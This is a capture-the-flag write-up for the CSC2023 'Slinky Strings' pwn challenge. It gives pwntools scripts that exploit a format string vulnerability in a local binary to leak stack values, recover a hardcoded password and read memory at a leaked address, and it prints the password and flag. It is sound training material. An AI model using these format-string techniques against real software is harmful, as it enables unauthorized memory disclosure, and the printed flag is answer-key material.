CSC2023 - [Pwn] - Slinky Strings
Challenge Description
some strings are not working.
Solution
The description and the title of challenge tells us there is format strings vulnerability in the binary
Lets check the protections on the binary
This shows that there is PIE disabled
Lets run the binary and check its behaviour
This shows that there is format string vulnerability
First of all we need to find the password. So for that thing we need to make a script which would read the stack and give us parts of password
from pwn import *
context.update(os='linux', arch='amd64')
context.log_level = "error"
for i in range(1, 30):
r = process('./slinky_strings')
payload = f"%{i}$p"
r.sendline(payload.encode())
print(r.recv(), i)
r.close()
Password: CSC_Super_Secure_P4$$w0rd
After that we have found out that there is a leak after entering that password
At this point we need to check that at which point the binary takes our input.
from pwn import *
context.update(os='linux', arch='amd64')
context.log_level = "error"
password = "CSC_Super_Secure_P4$$w0rd"
for i in range(1, 30):
r = process("./slinky_strings")
r.sendline(password.encode())
r.recv()
payload = f"%{i}$p.AAAAAAAA"
r.sendline(payload.encode())
print(r.recv(), i)
r.close()
our input is in 17 offset
Final Step
After we need to would pass our leak so that we would check its content
from pwn import *
context.update(os='linux', arch='amd64')
context.log_level = "error"
password = "CSC_Super_Secure_P4$$w0rd"
r = process("./slinky_strings")
r.sendline(password.encode())
leak = int(r.recv().split(b'\n')[0].split(b'- ')[2], 16)
payload = b"%17$s.AA" + p64(leak)
r.sendline(payload)
print(r.recv())
Flag
CSC{Kese_ho_theek_hona}Writeups 2023 © RootxRAN.